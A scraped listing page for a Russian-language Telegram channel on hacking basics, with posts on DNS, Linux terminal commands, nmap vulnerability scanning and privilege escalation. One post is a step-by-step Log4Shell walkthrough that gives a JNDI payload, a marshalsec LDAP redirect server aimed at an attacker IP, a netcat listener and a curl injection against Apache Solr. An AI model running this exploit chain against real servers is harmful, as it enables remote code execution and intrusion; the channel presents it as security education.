Получи случайную криптовалюту за регистрацию!

Hacked by Python

Логотип телеграм канала @hackedbypython — Hacked by Python H
Логотип телеграм канала @hackedbypython — Hacked by Python
Адрес канала: @hackedbypython
Категории: Технологии
Язык: Русский
Количество подписчиков: 1.36K
Описание канала:

О хакинге и кибербезопасности просто и понятно
Чат: https://t.me/zametkiitshnika4at
ДЛЯ ОСОБО ОДАРЕННЫХ: РЕКЛАМА НА ВАШЕМ КАНАЛЕ НЕ ИНТЕРЕСУЕТ‼️
Цена и покупка рекламы: https://t.me/hbptnprice

Рейтинги и Отзывы

4.00

3 отзыва

Оценить канал hackedbypython и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

1

4 звезд

1

3 звезд

1

2 звезд

0

1 звезд

0


Последние сообщения

2022-01-17 12:00:32 Основы повышения привилегий

Всем Асап! Сегодня речь пойдет о повышении привилегий на Linux системах.

Чтобы сразу не углубляться в дебри, имеет смысл сказать, что есть администратор (root) и другие пользователи, имена у которых могут быть разные. Зависит от воображения.

Пользователи делятся на группы, котором администратор назначает доступ к различным файлам и командам. Нас интересует команда sudo.

Sudo (англ. Substitute User and do, дословно «подменить пользователя и выполнить») — программа для системного администрирования UNIX-систем, позволяющая делегировать те или иные привилегированные ресурсы пользователям с ведением протокола работы.

Например:
Sudo whoami. Данная команда запустит команду whoami от лица root пользователя, которую в свою очередь скажет нам, "под каким" пользователем мы находимся в системе.

Смысл заключается в том, что мы можем эксплуатировать не правильные системные настройки или же версию ядра для получения более высоких привилегий в системе. Об этом я расскажу чуть позже. Важно понять азы.
397 views09:00
Открыть/Комментировать
2022-01-17 03:34:21
Привет, в среду пройдет 7-й онлайн-митап, на котором сводим работодателей и кандидатов (Backend, Frontend, QA и Product) при помощи анонимных голосовых чатов.

Мероприятие:
Быстрый формат 10-минутных конференций
Позволит познакомиться с HR и коллегами по цеху
Вы можете оценить себя на рынке
Анонимно (вы можете обменяться контактами по желанию)

Митап пройдет 19 января (среда) с 19:00 до 20:00. На него можно зарегистрироваться через нашего бота. 
@star_hub_bot
58 views00:34
Открыть/Комментировать
2022-01-14 18:08:30 Друзья, если тут есть люди которые ведут свой канал, менеджеры, те кто работает в SMM, то попрошу Вас отписать мне @Pyth0nnn .Спасибо
279 views15:08
Открыть/Комментировать
2022-01-12 18:31:17 Уязвимость log4j или же CVE-2021-44228
Всем Асап. спустя месяц не активности я возвращаюсь, чтобы поведать вам о том как 9 декабря мир информационных технологий узнал о новой уязвимости, которая затрагивает пакет ведения журналов log4j. Эта уязвимость получила оценку серьезности 10,0 (наиболее критическая оценка) и предлагает удаленное выполнение простого удаленного кода на хостах, использующих программное обеспечение, использующее эту log4jверсию. Эта атака получила название «Log4Shell».

Небольшое примечание. В настоящий момент крайне важно сделать интернет более безопасным. Если у Вас есть шанс рассказать об этой уязвимости своим знакомым или друзьям у которых есть свои it проекты, Вам следует сделать это. Уязвимость очень актуальна и в плохих руках представляет реальную угрозу. Только мы способны это исправить.

Уязвимость может располагаться на сервисах, которые находятся на достаточно необычных портах. Поэтому для сканирования с nmap имеет смысл написать команду -р-, чтобы просканировать все порты.

Например в моем случае это был Solr Apache с портом 8989.

Формат полезной нагрузки выглядит так: ${jndi:ldap://ATTACKERCONTROLLEDHOST}
Нам понадобится LDAP сервер для перенаправления запроса жертвы на другое место, где можно будет разместить нашу полезную нагрузку.

Давайте приготовим все для выполнения данной уязвимости.
1. Git clone https://github.com/mbechler/marshalsec
2. Sudo apt install maven
3. А, и ещё, ваша версия java должна быть 8. Какая именно сказать не могу.
4. Внутри marshalsec пишем mvn clean package -DskipTests
5. java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"
И наш ldap готов.

Теперь включим прослушивание порта с netcat и запустим питон сервер.
1. nc -lvnp 9001
2. python 3 -m http.server 8080

Наконец, все, что осталось сделать, это активировать эксплойт и активировать наш синтаксис JNDI! Обратите внимание на изменения в номере порта (теперь это относится к нашему серверу LDAP) и в ресурсе, который мы извлекаем, с указанием нашего эксплойта: curl 'http://MACHINE_IP:8983/solr/admin/cores?foo=$\{jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit\}

Так, говорю сразу, ваша полезная нагрузка может отличаться очень сильно. Поэтому у вас все может выглядеть иначе. Выше я говорил что тестил все на solr apache.

Ну вроде как, это все. Я не добавил пару вещей и если попросите, я сделаю вторую часть. Спасибо, что до читали до конца.
375 viewsedited  15:31
Открыть/Комментировать
2022-01-09 18:55:06 Всех вижу, ждите
486 views15:55
Открыть/Комментировать
2022-01-09 18:33:41
Знаю, что я не много опоздал. Однако надо ли вам объяснить, что такое log4j? И показать как работает эта уязвимость?
Anonymous Poll
93%
Да
7%
Нет
199 voters521 views15:33
Открыть/Комментировать
2022-01-02 19:35:34 Друзья, всех поздравляю с прошедшим Новым Годом.

Желаю, чтобы каждый из Вас достигал целей, которые он/она поставил(а) перед собой. Очень надеюсь, что мы будем делать это вместе.

С завтрашнего дня посты будут выходить в обычном режиме. Я приготовил много интересных тем.

Жду всех
264 views16:35
Открыть/Комментировать
2021-12-12 20:07:36 DNS в деталях

Всем Асап. Сегодня мы будем говорить про DNS или же Domain Name System. Это веб приложение или же сервер, который нужен для получения Ip адреса по имени хоста в сети.

Дело в том, что изначально доменов не было и были только ip адреса, поэтому когда интернет стал массовым явлением и перестал быть ARPANET, пользователям надо было облегчить жизнь. Потому, запоминать каждый адрес из цифр просто невозможно.

Домены бывают нескольких типов: TLD (домен верхнего уровня), Домен второго уровня и субдомен.

1. Так, например, TLD hackedbypython.com - это .com . Существует два типа TLD: gTLD (общий верхний уровень) и ccTLD (национальный домен верхнего уровня).Исторически gTLD предназначался для того, чтобы сообщать пользователю назначение доменного имени; например .com будет использоваться в коммерческих целях, .org - для организации, .edu - для образования, а .gov - для правительства.

Если взять в качестве примера hackedbypython.com, то часть .com - это TLD, а tryhackme - это домен второго уровня. При регистрации доменного имени домен второго уровня ограничен 63 символами.

Субдомен находится слева от домена второго уровня, и его разделяет точка; например, в имени admin.hackedbypython.com административная часть - это Субдомен. Длина должна быть не более 253 символов
528 views17:07
Открыть/Комментировать
2021-12-10 14:50:51 Основы работы с терминалом

Всем Асап. Давайте поговорим про основы работы с терминалом в Linux. Зачастую владение именно этим пунктом играет ключевую роль в скорости вашей работы и общей осведомлённости.

Все пользователи работают через оболочку под названием bash. Оболочек бывает огромное количество. Например для ssh одна оболочка, для работы напрямую другая и так далее.

Предлагаю затронуть некоторые из команд, которые смогут облегчить Вам жизнь:

1. Команда Su. Благодаряsu команде переключаться между пользователями в системе Linux очень просто . Если вы не являетесь пользователем root (или не используете права root через sudo), вам необходимо знать две вещи, чтобы облегчить этот переход учетных записей пользователей.

2. Команда Vim. VIM - гораздо более продвинутый текстовый редактор. Хотя от вас не ожидают знания всех дополнительных функций, полезно упомянуть об этом, чтобы улучшить свои навыки работы с Linux.

3. Команда Wget. Данная команда помогает пользователям Linux систем скачивать файлы. Например, вы можете загрузить программу, скрипт или даже картинку. К счастью для нас, есть несколько способов получить эти файлы и Wget один из них.
648 views11:50
Открыть/Комментировать
2021-12-08 12:00:53 Хитрости использования Nmap: Часть 2

Всем Асап. Сегодня закончим небольшую серию постов про nmap. А именно поговорим про скрипты, благодаря которым можно обнаружить уязвимости на сервере в сети. Данные скрипты входят в nmap по умолчанию, поэтому качать ничего не надо.

#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

Использование скриптов крайне простое. Для корректной работы программного обеспечения, Вам следует дописать данную команду:
--script vulners --script-args mincvss=

Имейте в виду, что сценарий зависит от наличия информации о версиях программного обеспечения, поэтому он работает только с флагом -sV.

Пример использования nmap -sV --script vulners --script-args mincvss=5.00 10.10.11.117

Где mincvss это значение оценки угрозы Common Vulnerability Scoring System.

Скрипт NSE использует информацию об известных сервисах для предоставления данных об уязвимостях. Обратите внимание, что он уже включен в стандартную библиотеку nmap NSE.
773 views09:00
Открыть/Комментировать